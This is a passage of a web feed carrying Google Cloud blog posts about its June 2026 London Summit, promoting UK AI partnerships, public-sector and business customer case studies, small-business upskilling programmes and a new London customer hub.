&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UK startups also continue to break new ground with technology, and AI in particular, as demonstrated by the work of frontier labs like &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-16-Ineffable-Intelligence-Selects-Google-Cloud-To-Power-Its-Superintelligence-Mission" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Ineffable Intelligence&lt;/strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; The company, which launched earlier this year, has chosen Google Cloud as its preferred cloud partner, utilizing Google’s full stack of AI-optimized hardware and tools to build and train Ineffable’s first generation of foundational models. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Led by David Silver, a former Google DeepMind researcher who &lt;/span&gt;&lt;a href="https://deepmind.google/research/alphago/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;was instrumental in the AlphaGo project&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Ineffable Intelligence is taking a unique approach to AI development. The team are building systems that learn primarily through their own experience through &lt;/span&gt;&lt;a href="https://cloud.google.com/discover/what-is-reinforcement-learning?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;reinforcement learning&lt;/span&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; instead of relying on the large-scale human-generated datasets behind language models. The ambition is to create a “superlearner” that develops knowledge through trial and error. This year, Ineffable Intelligence set a record for a European seed funding round of $1.1 billion, and now Ineffable Intelligence will support its training work by deploying one of the largest clusters of A5X, powered by the NVIDIA Vera Rubin NVL72 platform on Google Cloud, delivering massive computational scale.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To move from experimentation to true industrial production, businesses need more than just models; they need a roadmap. To help show them the way, we’re expanding our partnership with &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-17-Deloitte-and-Google-Cloud-Collaborate-to-Launch-London-AI-Studio-to-Spearhead-UKs-Transition-to-Agentic-AI" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Deloitte&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which will open a new AI Studio at its London campus. Developed in collaboration with Google Cloud, the studio will help British organisations move beyond AI experimentation to deploy autonomous, action-oriented AI systems at scale. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deloitte is also committing to upskill 1,000 members of its UK AI and data workforce on &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise?utm_source=google&amp;amp;utm_medium=cpc&amp;amp;utm_campaign=1713762-Gemini_Enterprise-DR-NA-US-en-Google-BKWS-EXA-GEnterprise&amp;amp;utm_content=c-Hybrid+%7C+BKWS+-+MIX+%7C+Txt_Gemini+Enterprise-189528400785&amp;amp;utm_term=gemini+enterprise&amp;amp;gclsrc=aw.ds&amp;amp;gad_source=1&amp;amp;gad_campaignid=23370621055&amp;amp;gclid=CjwKCAjwxb7RBhA5EiwAQ-AAdKh3HIPjJKRwMUI9Oxjo06q7orhp2vGKY396Yd4ENN8oULqQrQ2vkhoCAqQQAvD_BwE&amp;amp;e=48754805&amp;amp;hl=en"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This certification program will ensure that Deloitte’s AI and data engineers’ are equipped with the technical expertise to implement Google’s most advanced agentic architecture, providing UK clients with one of the largest pools of certified AI talent in the region.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Building a future-ready public sector&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The blueprint for a modern digital government requires moving away from rigid legacy contracts toward agile, AI-driven public services. In collaboration with the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Ministry of Housing, Communities and Local Government (MHCLG)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;i.AI &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;incubator, Google Deepmind, and Faculty, we are delivering &lt;/span&gt;&lt;a href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/google-cloud-summit-london-2026" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;tangible public sector reform and tools for reinvention&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that directly support the national goal to "get Britain building."&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agencies like MHCLG are already using a tool called Extract which was built using Google technology to help transform planning processes by reducing document processing times from two hours to just two minutes. Simultaneously, we are supporting trials of an AI planning tool — co-created with local planning authorities in Barnet, Dorset, and Camden — which aims to cut decision times for everyday applications by 50%. Furthermore, &lt;/span&gt;&lt;a href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/uk-department-for-transport-accelerates-public-policy-insights-with-google-cloud-ai/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;the Department for Transport (DfT)&lt;/strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;is utilizing Gemini to streamline public consultation analysis, a move projected to save £4 million annually.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Innovation on this scale also requires a secure, sovereign foundation. That is why Google Cloud is working to strengthen our UK data residency commitments, including measures like making Gemini 3.5 Flash, which features in-country AI processing, available by late June 2026 for sensitive sovereign use cases. We are giving British organizations the confidence to innovate within strict compliance boundaries.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help keep businesses safe from the challenges posed by bad actors using AI and other digital threats, we also recently announced a &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;comprehensive AI-powered cybersecurity platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; — Google AI Threat Defense — which combines Wiz, Mandiant, Gemini &amp;amp; CodeMender to find, fix, and protect our customers from vulnerabilities.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Proven impact from the high street to public service&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Autonomous agents are no longer a future prospect; they are delivering value across the UK economy today. Our work with &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-17-THG-Ingenuity-Launches-AI-Shopping-Assistant-in-Collaboration-with-Google-Cloud,-Driving-8x-Higher-Conversions" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;THG Ingenuity&lt;/strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;,&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; an ecommerce solutions provider, has delivered an 8x higher conversion rate via its AI Shopping Assistant. &lt;/span&gt;&lt;a href="https://www.starlingbank.com/news/starling-launches-pioneering-ai-banking-tool/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Starling&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;is similarly empowering customers with "spending intelligence" tools for instant habit analysis around purchases and expenses. And Rightmove, has launched a beta version of an AI-powered conversational property search, built with Google’s Gemini models, enabling users to search for homes in their own words.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The breadth of this impact is visible across every sector: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Txfm-3RZ1GQ&amp;amp;t=2s" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Kingfisher&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is pioneering retail-specific agentic applications; &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-03-25-Openreach-Taps-Google-Cloud-AI-to-Accelerate-High-Speed-Internet-Access-and-Cut-Carbon,1" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Openreach&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is driving field service optimization in telecommunications; andUnilever is using AI at scale across the entire value chain to drive growth and build desirable brands in the new era of consumer goods.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Meanwhile, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;VMO2&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; is streamlining complex data operations; &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2024-10-08-Vodafone-and-Google-Deepen-Strategic-Partnership-with-Ten-Year,-Billion-Dollar-Deal-including-Cloud,-Cybersecurity-and-Devices-Across-Europe-and-Africa" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Vodafone&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is executing a $1 billion partnership to redefine network performance; and &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;WPP is integrating Gemini across creative workflows, whether that's generating high-fidelity campaign assets at speed and scale, powering AI agents, or training &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/infrastructure/wpp-humanoid-robots-ai-training?e=48754805"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;robotic camera operators&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Empowering the engine of growth for small to medium businesses and startups &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The true measure of Britain’s AI success &lt;/span&gt;&lt;a href="https://cloud.google.com/topics/startups/london-summit-2026-smb-sme-ai-innovation"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;lies in its small and medium enterprises&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and startup ecosystem. Our AI Works research highlights a pivotal moment: AI has the potential to boost productivity for small and medium enterprises by 20% and unlock £198 billion in output for the UK economy. With 56% of smaller firms already seeking guidance, we have launched the &lt;/span&gt;&lt;a href="https://about.google/intl/ALL_uk/around-the-globe/local-info/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;AI Works for Britain&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; upskilling&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; initiative to ensure no business is left behind.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We also continue to foster the next generation of British unicorn startups through &lt;/span&gt;&lt;a href="https://technation.io/london-ai-hub-partnership-withhttps://technation.io/london-ai-hub-partnership-with-google-cloud/-google-cloud/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;our ongoing partnership with Tech Nation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; at the London AI Hub. This sustained commitment ensures founders have the resources and community needed to scale, and this September, we will further this mission by hosting the&lt;/span&gt;&lt;a href="https://startup.google.com/programs/gemini-startup-forum/cyber-security/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; Gemini Startup Forum: Cybersecurity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in London to help startups build secure-by-design AI applications. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The Model Garden&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; at &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Platform 37&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our belief in the UK’s potential is reflected in our physical footprint, too. We are continuing to invest in the UK's digital infrastructure to support growing demand: Our state-of-the-art data center in Waltham Cross launched in September 2025, a key part of our two-year, £5 billion investment to help power the UK's AI economy. And earlier this year, we opened our new&lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;office in London in Kings Cross, &lt;/span&gt;&lt;a href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/platform-37-the-ai-exchange/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Platform 37&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, along with plans for The AI Exchange, a new public space dedicated to deepening understanding of AI. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Building on this momentum, we are excited to introduce &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-17-Google-Clouds-Model-Garden-at-Platform-37-An-Exclusive-Customer-Hub-for-AI-Innovation-and-Collaboration" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;The Model Garden at Platform 37,&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; launching in the fourth quarter of 2026. This London-based hub is far more than a physical space; it serves as a strategic investment designed to fundamentally elevate how we engage with our most important customers. Blending the timeless aesthetics of a classic English garden with immersive, high-tech innovation — from living digital walls to a three-story atrium — The Model Garden acts as a physical marketplace for our best ideas. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The blueprint for the agentic enterprise&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For UK businesses, civic leaders, and organizations to continue to lead in the AI moment, they must not only rethink the technology they use but also fundamental aspects of how we work. As we support thousands of organizations and millions of teams here and around the globe, we see three core strategies helping achieve success with AI:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Culture:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We must reimagine our organizations for the future. True transformation means getting teams excited, enabled, and equipped to work with AI agents in completely new ways. It is about human-AI collaboration, not just automation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Responsibility:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We must build with safety and security in mind from day one. Protecting your users, your customers, and your brand is paramount. Our frontier models are built on a foundation of rigorous AI principles and secure-by-design infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Sustainability:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; In an era of rising compute demands, we must scale in a way that is both financially viable and positive for our planet. At Google, we are committed to carbon-free energy 24/7, ensuring that the UK’s AI growth does not come at the cost of our climate goals.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Architecting the future together&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud is the primary partner for the UK’s agentic transition. We are moving beyond the hype of experimentation into the rigor of production. From the research labs of King's Cross to the diverse enterprises powering the high street, we are architecting a resilient, sovereign, and prosperous future for the United Kingdom. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Thank you to everyone who’s joining us in London — yesterday, today, and into the future. This year we’ve packaged up an &lt;/span&gt;&lt;a href="https://www.googlecloudevents.com/london-summit?utm_content=online_blog&amp;amp;utm_source=cloud_sfdc&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-EMEA-EME39630-physicalevent-er-London-Summitmc-168582" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;exclusive on-demand experience&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, allowing you to stream the defining London Summit moments, available anywhere, anytime.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/inside-google-cloud/london-summit-2026-uk-leads-agentic-enterprise-ai-infrastructure-data-cloud" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-17T08:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/startups/london-summit-2026-smb-sme-ai-innovation</id>
    <title>How growing UK midsize businesses are building in the AI era</title>
    <updated>2026-06-17T08:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The UK’s 5-million-plus small and midsize businesses and enterprises (SMBs) are the backbone of our economy. Today, we’re seeing these critical businesses begin to put AI to work, to operate more efficiently, move faster, and ultimately deliver better outcomes for their customers. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This shift is driven by tangible day-to-day results. According to &lt;/span&gt;&lt;a href="https://www.enterprisenation.com/learn-something/one-in-five-small-businesses-regularly-use-ai-new-enterprise-nation-research-finds/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;recent research&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; from Enterprise Nation published in partnership with Google, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;71% of AI adopters &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;surveyed in the UK say the technology helps them &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;save time on routine tasks, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;and&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; 64% &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;report a direct &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;boost in productivity&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. On top of this, AI-enabled productivity tools (like Google Workspace with Gemini) are delivering a &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2025-10-08-Google-Reveals-AIs-Potential-to-Supercharge-British-Small-Business-Innovation#:~:text=SME%20leaders%20believe%20these%20innovations,them%20an%20extra%20working%20day." rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;20% boost in productivity for SMBs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which effectively hands them back one full working day every single week.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud, we have a front row seat to this shift: SMBs have long utilized platforms like Google Workspace, and today they’re transforming with Google’s AI platform and models. In fact, we’ve seen the number of UK-based SMBs using Google Cloud AI &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;nearly double year-over-year.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This includes our Gemini models and products like Gemini Enterprise and AI Studio, which are helping SMBs do things like:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Roll out better customer support systems to help escalate and resolve customer support calls more quickly.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Automate repetitive actions in areas like payroll and accounting.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Help more employees understand and leverage data at work — even those not trained as data analysts.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Rapidly create and implement new designs for marketing collateral.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Help more people build their own AI agents to help them in their everyday jobs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Conduct complex research projects at a speed and price point previously unavailable.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At today’s &lt;/span&gt;&lt;a href="https://www.googlecloudevents.com/london-summit?utm_content=online_blog&amp;amp;utm_source=cloud_sfdc&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-EMEA-EME39630-physicalevent-er-London-Summitmc-168582" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud London Summit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we’re showcasing a number of innovative SMB customers who are actively using our AI tools to transform how they work, including companies who have recently expanded their work with us:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Neural Alpha&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a sustainability fintech company, is using Gemini models to read unstructured environmental and corporate sustainability reports to automatically find and organize thousands of key facts, cutting months of slow, manual research down to a fraction of the time.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Sep 2&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a digital security provider, uses Gemini Enterprise to deploy autonomous AI agents for 24/7 threat monitoring — accelerating incident detection and quickly neutralizing security threats for its customers. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Sunhouse,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; a strategic brand design agency, uses Gemini Enterprise to easily find archived design work stored on Google Drive, enabling its teams to spend less time hunting for files and more time growing its business with global brands.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Terrapinn&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a global B2B events company, is transforming its operations by leveraging Gemini models, NotebookLM, Looker, and BigQuery to turn manual tasks into automated workflows, accelerating how its teams design, market, and deliver world-class conferences.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;VoCoVo&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, a telecommunications provider, is integrating Google Cloud AI across its systems to turn isolated data into actionable intelligence and build autonomous workflows, streamlining routine operations so their team can focus on high-impact innovation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Empowering Your Team: AI Upskilling Resources for Growing British Businesses&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help midsize teams maximize their impact and confidently navigate the modern AI landscape, we’ve developed a suite of dedicated, no-cost upskilling resources. Whether you want to train your existing teams or democratize data tools across your entire workforce, these programs will help you build an AI-ready organization:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SMB-Focused Programs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Explore our new&lt;/span&gt; &lt;a href="https://www.skills.google/paths/4020?utm_campaign=SMB-learning-path" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SMB Learning Path&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or enroll in the &lt;/span&gt;&lt;a href="https://developers.google.com/program/gear" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Ready&lt;/span&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;(GEAR) program for specialized training in agentic AI.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="http://skills.google/learningcenter" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Google Skills for Organizations&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Access our no-cost, on-demand learning platform featuring over 3,000 AI courses and hands-on labs created by experts at Google Cloud and Google DeepMind.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://developers.google.com/program/gear/getcertified/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Get Certified&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Ready to validate your team's expertise? This premium, cohort-based program offers instructor-led training, technical mentorship, and AI-infused skill badges designed to prepare your team for industry-recognized certifications.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By offering a full suite of SMB technology and training — from productivity in Workspace, to all our Ads services, and now powerful AI tools — Google is helping small and midsize firms thrive, no matter where the future takes us. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/startups/london-summit-2026-smb-sme-ai-innovation" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-17T08:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/inside-google-cloud/london-summit-2026-uk-leads-agentic-enterprise-ai-infrastructure-data-cloud/</id>
    <title>From AI potential to agentic reality: Driving the UK’s next chapter</title>
    <updated>2026-06-17T08:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The United Kingdom, and London in particular, continues to be one of the great hubs for AI development in Europe and the world. We’re home to Google DeepMind, of course, as well as significant AI unicorns — and Google Cloud customers — like &lt;/span&gt;&lt;a href="https://www.googlecloudpresscorner.com/2026-06-16-Ineffable-Intelligence-Selects-Google-Cloud-To-Power-Its-Superintelligence-Mission" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Ineffable Intelligence&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which is today announcing an important partnership with us. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A year ago, we joined you for the London Summit to showcase &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/inside-google-cloud/london-summit-2025-gen-ai-agents-transforming-business-civil-service"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;the vast potential of generative AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, including a major investment in upskilling the UK civil service. Today, as we welcome our partners once again to the historic vaults of Tobacco Dock, that potential has become &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/next-26-building-the-agentic-enterprise-industry-highlights"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;an industrial-scale reality&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. In my conversations with leaders across both Whitehall and The City, the focus has moved from chatbots and media experiments to full-production execution. This is &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/google-cloud-next/welcome-to-google-cloud-next26"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;the moment of the agentic enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, where we shift from systems that simply chat with us to systems that can reason, plan, and execute multi-step workflows.&lt;/span&gt;&lt;/p&gt;
